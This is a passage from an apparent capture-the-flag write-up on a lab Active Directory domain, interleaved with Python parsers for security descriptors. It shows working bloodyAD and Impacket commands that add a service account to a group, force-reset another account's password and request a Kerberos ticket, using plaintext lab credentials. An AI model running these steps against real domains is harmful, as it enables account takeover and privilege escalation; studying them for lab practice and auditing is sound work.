a285-00aa003049e2;S-1-5-10)(OA;CIIOID;0x20094;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x20094;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;OICIID;0x30;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-10)(OA;CIID;0x130;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;S-1-5-10)(A;CIID;0xf01ff;;;S-1-5-21-2261381271-1331810270-697239744-519)(A;CIID;LC;;;S-1-5-32-554)(A;CIID;0xf01bd;;;S-1-5-32-544)
--
distinguishedName: OU=AD_Monitoring,DC=nanocorp,DC=htb
nTSecurityDescriptor: O:S-1-5-21-2261381271-1331810270-697239744-512G:S-1-5-21-2261381271-1331810270-697239744-512D:AI(D;;0x10040;;;S-1-1-0)(OA;CIIO;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-2261381271-1331810270-697239744-3102)(OA;CIIO;0x20014;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-2261381271-1331810270-697239744-3102)(OA;;0x3;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-32-548)(OA;;0x3;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-32-548)(OA;;0x3;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-32-548)(OA;;0x3;bf967aa8-0de6-11d0-a285-00aa003049e2;;S-1-5-32-550)(OA;;0x3;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-32-548)(A;;0xf01ff;;;S-1-5-21-2261381271-1331810270-697239744-512)(A;;0x20094;;;S-1-5-9)(A;;0x20094;;;S-1-5-11)(A;;0xf01ff;;;S-1-5-18)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2261381271-1331810270-697239744-526)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2261381271-1331810270-697239744-
527)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-3-0)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;0x20094;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;OICIID;0x30;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-10)(OA;CIID;0x130;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;S-1-5-10)(A;CIID;0xf01ff;;;S-1-5-21-2261381271-1331810270-697239744-519)(A;CIID;LC;;;S-1-5-32-554)(A;CIID;0xf01bd;;;S-1-5-32-544)
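Both grep searches above match a SID anywhere in the raw SDDL string, which is enough to find candidate objects but does not tell you what each matching ACE actually grants. The parser below, added here as an example and not part of the original writeup, splits each DACL into ACEs, decodes the rights mask (hex or two-letter SDDL codes) and the well-known object GUIDs that appear in this dump, and reports only the ACEs whose trustee is the SID of interest, flagging the ones that grant modify rights. SAMPLE_DUMP is a constructed excerpt of the nTSecurityDescriptor values shown above, trimmed to a few ACEs; the GUID table and MODIFY_RIGHTS set are my own choices. The same function run over a full SDs.txt export is a quick way for a defender to audit which non-privileged principals hold write rights anywhere in the directory.

```python
import re

# SDDL access-right abbreviations mapped to ADS_RIGHTS_ENUM bits
RIGHT_BITS = {
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100, "SD": 0x10000, "RC": 0x20000,
    "WD": 0x40000, "WO": 0x80000, "GA": 0x10000000, "GX": 0x20000000,
    "GW": 0x40000000, "GR": 0x80000000,
}
RIGHT_NAMES = {
    0x1: "CREATE_CHILD", 0x2: "DELETE_CHILD", 0x4: "LIST_CHILD",
    0x8: "WRITE_VALIDATED", 0x10: "READ_PROP", 0x20: "WRITE_PROP",
    0x40: "DELETE_TREE", 0x80: "LIST_OBJECT", 0x100: "CONTROL_ACCESS",
    0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DACL",
    0x80000: "WRITE_OWNER", 0x10000000: "GENERIC_ALL",
    0x20000000: "GENERIC_EXECUTE", 0x40000000: "GENERIC_WRITE",
    0x80000000: "GENERIC_READ",
}
# Well-known schema GUIDs seen in this dump; anything else is reported as the raw GUID.
# Note: bloodyAD folds READ_CONTROL|LIST_CHILD into "GENERIC_EXECUTE" when it resolves
# rights; this decoder keeps the specific bits instead.
OBJECT_GUIDS = {
    "bf9679c0-0de6-11d0-a285-00aa003049e2": "Self-Membership",
    "00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
    "bf967aba-0de6-11d0-a285-00aa003049e2": "User",
}
# Rights that let a trustee change the object or what it controls (my own selection)
MODIFY_RIGHTS = {"GENERIC_ALL", "GENERIC_WRITE", "WRITE_DACL", "WRITE_OWNER",
                 "WRITE_PROP", "WRITE_VALIDATED", "CONTROL_ACCESS"}

# Constructed excerpt of the SDs.txt dump shown in the writeup (a few ACEs per object)
SAMPLE_DUMP = """\
distinguishedName: CN=IT_Support,CN=Users,DC=nanocorp,DC=htb
nTSecurityDescriptor: O:S-1-5-21-2261381271-1331810270-697239744-512G:S-1-5-21-2261381271-1331810270-697239744-512D:AI(OA;;SW;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-2261381271-1331810270-697239744-1103)(A;;0x20014;;;S-1-5-21-2261381271-1331810270-697239744-1103)(A;;0xf01ff;;;S-1-5-21-2261381271-1331810270-697239744-512)
distinguishedName: CN=monitoring_svc,OU=AD_Monitoring,DC=nanocorp,DC=htb
nTSecurityDescriptor: O:S-1-5-21-2261381271-1331810270-697239744-512G:S-1-5-21-2261381271-1331810270-697239744-512D:(A;;0xf01ff;;;S-1-5-21-2261381271-1331810270-697239744-512)(OA;CIID;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-2261381271-1331810270-697239744-3102)(OA;CIID;0x20014;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-2261381271-1331810270-697239744-3102)
"""


def parse_rights(field):
    """Decode an SDDL rights field: either a hex mask or a run of two-letter codes."""
    if field.startswith("0x"):
        mask = int(field, 16)
    else:
        mask = 0
        for i in range(0, len(field), 2):
            mask |= RIGHT_BITS[field[i:i + 2]]
    return mask, [name for bit, name in RIGHT_NAMES.items() if mask & bit]


def parse_dacl(sddl):
    """Split the D: part of an SDDL string into decoded ACE dicts (SACL, if any, is ignored)."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]
    aces = []
    for body in re.findall(r"\(([^()]*)\)", dacl):
        fields = body.split(";")
        if len(fields) < 6:
            continue  # not a standard ACE layout
        ace_type, flags, rights, obj, inh_obj, trustee = fields[:6]
        mask, names = parse_rights(rights)
        flag_list = [flags[i:i + 2] for i in range(0, len(flags), 2)]
        aces.append({
            "type": ace_type, "flags": flags, "mask": mask, "rights": names,
            "object_type": OBJECT_GUIDS.get(obj, obj),
            "inherited_object_type": OBJECT_GUIDS.get(inh_obj, inh_obj),
            # An inherit-only ACE applies to children, not to this object itself
            "applies_to_self": "IO" not in flag_list,
            "trustee": trustee,  # raw SID; SDDL aliases such as DA/BA are not resolved here
        })
    return aces


def find_aces_for_sid(dump, sid):
    """Return (distinguishedName, ace) pairs for every ACE whose trustee is `sid`."""
    results, dn = [], None
    for line in dump.splitlines():
        if line.startswith("distinguishedName: "):
            dn = line.split(": ", 1)[1]
        elif line.startswith("nTSecurityDescriptor: ") and dn:
            for ace in parse_dacl(line.split(": ", 1)[1]):
                if ace["trustee"] == sid:
                    results.append((dn, ace))
    return results


def risky(ace):
    """True for allow ACEs that grant any modify-class right."""
    return ace["type"] in ("A", "OA") and bool(MODIFY_RIGHTS & set(ace["rights"]))


if __name__ == "__main__":
    for sid in ("S-1-5-21-2261381271-1331810270-697239744-1103",   # web_svc
                "S-1-5-21-2261381271-1331810270-697239744-3102"):  # IT_Support
        for dn, ace in find_aces_for_sid(SAMPLE_DUMP, sid):
            tag = "RISKY" if risky(ace) else "read "
            print(f"[{tag}] {dn}: {ace['type']} {'|'.join(ace['rights'])} "
                  f"on {ace['object_type'] or 'Self'} (flags={ace['flags'] or '-'})")
```

On the sample this reports web_svc's validated write on IT_Support's Self-Membership and IT_Support's inherited User-Force-Change-Password control-access right on monitoring_svc, which are exactly the two edges the grep output pointed at. For an audit, feed the full SDs.txt and loop over the SIDs of every principal that should be unprivileged.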
Looks like we have a couple of matches: the AD_Monitoring organizational unit (OU) and, even more interestingly, the monitoring_svc user. Let's take a look at monitoring_svc.
bloodyAD -d 'nanocorp.htb' --host 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' get object 'monitoring_svc' --resolve-sd
distinguishedName: CN=monitoring_svc,OU=AD_Monitoring,DC=nanocorp,DC=htb
accountExpires: 1601-01-01 00:00:00+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
badPwdCount: 0
cn: monitoring_svc
codePage: 0
countryCode: 0
dSCorePropagationData: 2025-04-09 22:57:47+00:00
displayName: monitoring_svc
givenName: monitoring_svc
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-04-10 01:15:05.371190+00:00
lastLogonTimestamp: 2025-04-10 01:15:05.371190+00:00
logonCount: 1
logonHours: ////////////////////////////
memberOf: CN=Protected Users,CN=Users,DC=nanocorp,DC=htb; CN=Remote Management Users,CN=Builtin,DC=nanocorp,DC=htb
nTSecurityDescriptor.Owner: Domain Admins
nTSecurityDescriptor.Control: DACL_PRESENT|SELF_RELATIVE
nTSecurityDescriptor.ACL.0.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.0.Trustee: RAS and IAS Servers
nTSecurityDescriptor.ACL.0.Right: READ_PROP
nTSecurityDescriptor.ACL.0.ObjectType: Logon-Information (property set); Remote-Access-Information (property set); Group-Membership (property set); Account-Restrictions (property set)
nTSecurityDescriptor.ACL.1.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.1.Trustee: Cert Publishers
nTSecurityDescriptor.ACL.1.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.1.ObjectType: X509-Cert
nTSecurityDescriptor.ACL.2.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.2.Trustee: WINDOWS_AUTHORIZATION_ACCESS_GROUP
nTSecurityDescriptor.ACL.2.Right: READ_PROP
nTSecurityDescriptor.ACL.2.ObjectType: Token-Groups-Global-And-Universal
nTSecurityDescriptor.ACL.3.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.3.Trustee: TERMINAL_SERVER_LICENSE_SERVERS
nTSecurityDescriptor.ACL.3.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.3.ObjectType: Terminal-Server; Terminal-Server-License-Server (property set)
nTSecurityDescriptor.ACL.4.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.4.Trustee: EVERYONE
nTSecurityDescriptor.ACL.4.Right: CONTROL_ACCESS
nTSecurityDescriptor.ACL.4.ObjectType: User-Change-Password
nTSecurityDescriptor.ACL.5.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.5.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.5.Right: CONTROL_ACCESS
nTSecurityDescriptor.ACL.5.ObjectType: Receive-As; Send-As; User-Change-Password
nTSecurityDescriptor.ACL.6.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.6.Trustee: AUTHENTICATED_USERS
nTSecurityDescriptor.ACL.6.Right: READ_PROP
nTSecurityDescriptor.ACL.6.ObjectType: Web-Information (property set); General-Information (property set); Personal-Information (property set); Public-Information (property set)
nTSecurityDescriptor.ACL.7.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.7.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.7.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.7.ObjectType: Phone-and-Mail-Options (property set); Web-Information (property set); Personal-Information (property set)
nTSecurityDescriptor.ACL.8.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.8.Trustee: ACCOUNT_OPERATORS; LOCAL_SYSTEM; Domain Admins
nTSecurityDescriptor.ACL.8.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.8.ObjectType: Self
nTSecurityDescriptor.ACL.9.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.9.Trustee: AUTHENTICATED_USERS
nTSecurityDescriptor.ACL.9.Right: READ_SD
nTSecurityDescriptor.ACL.9.ObjectType: Self
nTSecurityDescriptor.ACL.10.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.10.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.10.Right: GENERIC_READ
nTSecurityDescriptor.ACL.10.ObjectType: Self
+ nTSecurityDescriptor.ACL.11.Type: == ALLOWED_OBJECT ==
+ nTSecurityDescriptor.ACL.11.Trustee: IT_Support
+ nTSecurityDescriptor.ACL.11.Right: CONTROL_ACCESS
+ nTSecurityDescriptor.ACL.11.ObjectType: User-Force-Change-Password
+ nTSecurityDescriptor.ACL.11.InheritedObjectType: User
+ nTSecurityDescriptor.ACL.11.Flags: CONTAINER_INHERIT; INHERITED
+ nTSecurityDescriptor.ACL.12.Type: == ALLOWED_OBJECT ==
+ nTSecurityDescriptor.ACL.12.Trustee: IT_Support
+ nTSecurityDescriptor.ACL.12.Right: GENERIC_EXECUTE|READ_PROP
+ nTSecurityDescriptor.ACL.12.ObjectType: Self
+ nTSecurityDescriptor.ACL.12.InheritedObjectType: User
+ nTSecurityDescriptor.ACL.12.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.13.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.13.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.13.Right: READ_PROP
nTSecurityDescriptor.ACL.13.ObjectType: General-Information (property set); Remote-Access-Information (property set); Group-Membership (property set); Logon-Information (property set); Account-Restrictions (property set)
nTSecurityDescriptor.ACL.13.InheritedObjectType: inetOrgPerson
nTSecurityDescriptor.ACL.13.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.14.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.14.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.14.Right: READ_PROP
nTSecurityDescriptor.ACL.14.ObjectType: General-Information (property set); Remote-Access-Information (property set); Group-Membership (property set); Logon-Information (property set); Account-Restrictions (property set)
nTSecurityDescriptor.ACL.14.InheritedObjectType: User
nTSecurityDescriptor.ACL.14.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.15.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.15.Trustee: Enterprise Key Admins; Key Admins
nTSecurityDescriptor.ACL.15.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.15.ObjectType: ms-DS-Key-Credential-Link
nTSecurityDescriptor.ACL.15.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.16.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.16.Trustee: PRINCIPAL_SELF; CREATOR_OWNER
nTSecurityDescriptor.ACL.16.Right: WRITE_VALIDATED
nTSecurityDescriptor.ACL.16.ObjectType: DS-Validated-Write-Computer
nTSecurityDescriptor.ACL.16.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.16.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.17.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.17.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.17.Right: READ_PROP
nTSecurityDescriptor.ACL.17.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.17.InheritedObjectType: Computer; Group
nTSecurityDescriptor.ACL.17.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.18.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.18.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.18.Right: READ_PROP
nTSecurityDescriptor.ACL.18.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.18.InheritedObjectType: User
nTSecurityDescriptor.ACL.18.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.19.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.19.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.19.Right: WRITE_PROP
nTSecurityDescriptor.ACL.19.ObjectType: ms-TPM-Tpm-Information-For-Computer
nTSecurityDescriptor.ACL.19.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.19.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.20.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.20.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.20.Right: GENERIC_READ
nTSecurityDescriptor.ACL.20.ObjectType: Self
nTSecurityDescriptor.ACL.20.InheritedObjectType: inetOrgPerson; Group
nTSecurityDescriptor.ACL.20.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.21.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.21.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.21.Right: GENERIC_READ
nTSecurityDescriptor.ACL.21.ObjectType: Self
nTSecurityDescriptor.ACL.21.InheritedObjectType: User
nTSecurityDescriptor.ACL.21.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.22.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.22.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.22.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.22.ObjectType: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
nTSecurityDescriptor.ACL.22.Flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
nTSecurityDescriptor.ACL.23.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.23.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.23.Right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.23.ObjectType: Private-Information (property set)
nTSecurityDescriptor.ACL.23.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.24.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.24.Trustee: Enterprise Admins
nTSecurityDescriptor.ACL.24.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.24.ObjectType: Self
nTSecurityDescriptor.ACL.24.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.25.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.25.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.25.Right: LIST_CHILD
nTSecurityDescriptor.ACL.25.ObjectType: Self
nTSecurityDescriptor.ACL.25.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.26.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.26.Trustee: BUILTIN_ADMINISTRATORS
nTSecurityDescriptor.ACL.26.Right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
nTSecurityDescriptor.ACL.26.ObjectType: Self
nTSecurityDescriptor.ACL.26.Flags: CONTAINER_INHERIT; INHERITED
name: monitoring_svc
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=nanocorp,DC=htb
objectClass: top; person; organizationalPerson; user
objectGUID: ad8bdb53-ee9b-4056-a80c-b31aa4037ad6
objectSid: S-1-5-21-2261381271-1331810270-697239744-3101
primaryGroupID: 513
pwdLastSet: 2025-11-09 06:28:54.913940+00:00
sAMAccountName: monitoring_svc
sAMAccountType: 805306368
uSNChanged: 172665
uSNCreated: 77904
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
userPrincipalName: monitoring_svc@nanocorp.htb
whenChanged: 2025-11-09 06:28:54+00:00
whenCreated: 2025-04-09 22:47:18+00:00
Looks like they're a member of Protected_Users and Remote Management. Additionally, ACE 11 gives the IT_Support group CONTROL_ACCESS on User-Force-Change-Password, inherited onto every user object: that is the ForceChangePassword primitive, which lets a member reset monitoring_svc's password without knowing the current one. Two things to keep in mind before using it: a reset is loud (pwdLastSet changes and the DC logs the reset), and Protected_Users membership means the account will refuse NTLM, so everything after the reset has to go over Kerberos.
Having found a path to a Remote Management user, let's execute it. First we add web_svc to the IT_Support group.
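Reading thirty ACEs by eye is error-prone, so here is an added example (mine, not part of the original write-up or of bloodyAD) that parses bloodyAD's nTSecurityDescriptor.ACL.<n>.* lines and reports only the allow ACEs a non-privileged trustee could abuse. The right and ObjectType names are bloodyAD's own rendering as seen in the dump above; the DEFAULT_TRUSTEES list, the abuse table and the embedded sample dump (a subset of the ACEs above, pasted as text) are my assumptions.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# One bloodyAD output line per ACE field, optionally prefixed with the '+' highlight marker.
ACE_LINE = re.compile(r"^\+?\s*nTSecurityDescriptor\.ACL\.(\d+)\.(\w+):\s*(.*?)\s*$")

# Trustees expected to hold powerful rights on every user object; findings for them are
# noise in an escalation review. Assumption: adjust to the domain you are looking at.
DEFAULT_TRUSTEES = {
    "Domain Admins", "Enterprise Admins", "BUILTIN_ADMINISTRATORS", "LOCAL_SYSTEM",
    "ACCOUNT_OPERATORS", "Enterprise Key Admins", "Key Admins", "PRINCIPAL_SELF",
    "CREATOR_OWNER", "ENTERPRISE_DOMAIN_CONTROLLERS",
}

# Rights that hand over the object regardless of ObjectType.
TAKEOVER_RIGHTS = {"GENERIC_ALL", "GENERIC_WRITE", "WRITE_DACL", "WRITE_OWNER"}

# (required right, ObjectType) pairs with a known abuse primitive on user objects.
OBJECT_RIGHTS = {
    ("CONTROL_ACCESS", "User-Force-Change-Password"): "reset the password without knowing the old one",
    ("WRITE_PROP", "ms-DS-Key-Credential-Link"): "add a shadow credential and authenticate with PKINIT",
    ("WRITE_PROP", "ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity"): "set up resource-based constrained delegation",
    ("WRITE_PROP", "Self"): "write any attribute (SPN for a targeted Kerberoast, key credential link, ...)",
}


@dataclass(frozen=True)
class Finding:
    ace: int
    trustee: str
    right: str
    object_type: str
    abuse: str


def parse_aces(dump: str) -> dict[int, dict[str, str]]:
    """Group 'nTSecurityDescriptor.ACL.<n>.<Field>: value' lines by ACE index."""
    aces: dict[int, dict[str, str]] = {}
    for line in dump.splitlines():
        m = ACE_LINE.match(line)
        if m:
            aces.setdefault(int(m.group(1)), {})[m.group(2)] = m.group(3)
    return aces


def _split(value: str) -> list[str]:
    # bloodyAD joins several trustees or object types with '; ' and tags property sets.
    return [v.replace("(property set)", "").strip() for v in value.split(";") if v.strip()]


def abusable_aces(dump: str, ignore: set[str] = DEFAULT_TRUSTEES) -> list[Finding]:
    """Return the allow ACEs whose trustee is not in `ignore` and whose rights map to an abuse."""
    findings: list[Finding] = []
    for idx, ace in sorted(parse_aces(dump).items()):
        if not ace.get("Type", "").strip("= ").startswith("ALLOWED"):
            continue  # DENIED ACEs remove rights; they never create a path
        rights = set(ace.get("Right", "").split("|"))
        objects = _split(ace.get("ObjectType", ""))
        for trustee in _split(ace.get("Trustee", "")):
            if trustee in ignore:
                continue
            for right in sorted(rights & TAKEOVER_RIGHTS):
                findings.append(Finding(idx, trustee, right, "; ".join(objects), "full control of the object"))
            for (right, obj), abuse in OBJECT_RIGHTS.items():
                if right in rights and obj in objects:
                    findings.append(Finding(idx, trustee, right, obj, abuse))
    return findings


# Constructed sample: a subset of the ACEs from the monitoring_svc dump above, not a live query.
SAMPLE_DUMP = """\
nTSecurityDescriptor.ACL.4.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.4.Trustee: EVERYONE
nTSecurityDescriptor.ACL.4.Right: CONTROL_ACCESS
nTSecurityDescriptor.ACL.4.ObjectType: User-Change-Password
nTSecurityDescriptor.ACL.8.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.8.Trustee: ACCOUNT_OPERATORS; LOCAL_SYSTEM; Domain Admins
nTSecurityDescriptor.ACL.8.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.8.ObjectType: Self
+ nTSecurityDescriptor.ACL.11.Type: == ALLOWED_OBJECT ==
+ nTSecurityDescriptor.ACL.11.Trustee: IT_Support
+ nTSecurityDescriptor.ACL.11.Right: CONTROL_ACCESS
+ nTSecurityDescriptor.ACL.11.ObjectType: User-Force-Change-Password
+ nTSecurityDescriptor.ACL.12.Type: == ALLOWED_OBJECT ==
+ nTSecurityDescriptor.ACL.12.Trustee: IT_Support
+ nTSecurityDescriptor.ACL.12.Right: GENERIC_EXECUTE|READ_PROP
+ nTSecurityDescriptor.ACL.12.ObjectType: Self
nTSecurityDescriptor.ACL.15.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.15.Trustee: Enterprise Key Admins; Key Admins
nTSecurityDescriptor.ACL.15.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.15.ObjectType: ms-DS-Key-Credential-Link
"""

if __name__ == "__main__":
    for f in abusable_aces(SAMPLE_DUMP):
        print(f"ACE {f.ace}: {f.trustee} has {f.right} on {f.object_type} -> {f.abuse}")
```

Run against the full dump it reports exactly the IT_Support ACE; Everyone's User-Change-Password (changing your own password with the old one) is correctly left alone, and the Key Admins and Domain Admins entries only surface if you empty the ignore set.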
bloodyAD -d 'nanocorp.htb' --host 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' add groupMember 'IT_Support' 'web_svc'
[+] web_svc added to IT_Support
Next let’s force change password on monitoring_svc.
bloodyAD -d 'nanocorp.htb' --host 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' set password 'monitoring_svc' 'Password123!'
[+] Password changed successfully!
Simply pointing evil-winrm at the box with the new password doesn't work: monitoring_svc is in Protected Users, so NTLM authentication is rejected and we need a Kerberos ticket instead. Sync the clock with the DC first (Kerberos tolerates only a few minutes of skew) and request a TGT. Protected Users also caps the TGT lifetime at four hours, so expect to re-run this if the session outlives it.
sudo ntpdate -s dc01.nanocorp.htb; getTGT.py 'nanocorp.htb/monitoring_svc:Password123!'
Impacket v0.13.0.dev0+20251016.112753.23a36c62 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in monitoring_svc.ccache
Next, generate a krb5.conf so the Kerberos libraries know the realm and which KDC to talk to; I'll be using Ben Heater's method. The template uses placeholder tokens that sed swaps for the variables; the token names were lost when this page was rendered, so they are reconstructed here as __UPPER_REALM__, __LOWER_REALM__ and __DC_HOSTNAME__.

LOWER_REALM='nanocorp.htb'
